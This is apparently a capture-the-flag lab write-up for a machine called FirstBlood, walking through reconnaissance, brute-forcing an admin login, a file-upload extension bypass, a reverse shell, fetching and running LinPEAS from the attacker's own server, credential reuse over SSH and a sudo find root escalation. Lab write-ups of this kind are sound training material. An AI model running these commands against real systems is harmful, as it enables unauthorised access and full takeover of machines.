This report documents the exploitation of the FirstBlood lab environment. The objective was to identify vulnerabilities in the web application, gain initial access, and escalate privileges to root.

๐Ÿ”น Reconnaissance

I began with a full port scan against the target machine:

nmap 172.18.13.234 -T4 -A -p- -vv ๐Ÿ” Open Ports Found: 22/tcp โ†’ OpenSSH 9.6 80/tcp โ†’ Apache httpd 2.4.65

The web server hosted a corporate website:

SecureCorp โ€” Web Development Services ๐Ÿ”น Information Gathering

While analyzing the website, I discovered an email address:

None

info@securelycorp.local

This revealed an internal domain:

securelycorp.local

I added it to my hosts file:

echo "172.18.13.234 securelycorp.local" | sudo tee -a /etc/hosts

None

๐Ÿ”น Directory Enumeration

Using directory brute-force techniques, I discovered hidden endpoints:

/admin /upload

None

Both endpoints required authentication, indicating administrative functionality.

๐Ÿ”น Admin Panel Discovery

The /admin endpoint redirected to:

/admin/login.php

None

This confirmed the presence of a login portal.

๐Ÿ”น Authentication Bypass via Brute Force

Due to lack of rate limiting, a brute-force attack was performed against the login form.

Valid credentials were discovered:

Using burpsuit intruder

Username: admin Password: admin123

Access to the admin dashboard was successfully obtained.

๐Ÿ”น File Upload Exploitation

Inside the admin panel, a file upload feature was discovered. However, direct PHP uploads were blocked.

None

๐Ÿ”ง Bypass Technique:

Uploaded file renamed from:

hacker.php โ†’ hacker.php.jpg Intercepted request and modified extension back to .php

The payload was then executed at:

http://securelycorp.local/uploads/hacker.php ๐Ÿ”น Reverse Shell Access

Before execution, a listener was started:

nc -nvlp 1234

None

Upon triggering the payload, a reverse shell was obtained successfully.

๐Ÿ”น Initial System Access

None

After gaining shell access:

/root โ†’ access denied

/home โ†’ user directory found (webdev)

None

This confirmed low-privileged access.

๐Ÿ”น Privilege Enumeration

You have to download linpeas.sh in your pc first using: wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh After at your pc go where you have download host server to download for victim using python3 -m http.server

LinPEAS was transferred and executed for system analysis:

python3 -m http.server 8000 wget http://YOUR IP:8000/linpeas.sh chmod +x linpeas.sh ./linpeas.sh

None

๐Ÿ”น Credential Discovery

During enumeration, database credentials were found:

None

DB_USER: dbuser

DB Password: DevPass2024! ๐Ÿ”น SSH Access on port 22 we notice while nmap

An SSH service was available on the target.

None

Initial login attempt with DB user failed, but reuse of credentials with system user succeeded:

None
THE FIRST FLAG IS IN LOCAL.TXT

Username: webdev Password: DevPass2024!

SSH access was successfully obtained.

๐Ÿ”น Privilege Escalation

Privilege enumeration revealed sudo misconfiguration:

sudo -l

The user could execute /usr/bin/find with elevated privileges.

๐Ÿ”ฅ Root Exploitation

Using the misconfigured binary, root access was achieved:

sudo find . -exec /bin/bash -p \;

This spawned a root shell.

๐Ÿ”น Final Result

None
THE PROOF.TXT IS OUR 2ND FLAG

Root access was successfully obtained and all flags were retrieved.

THANK YOU!!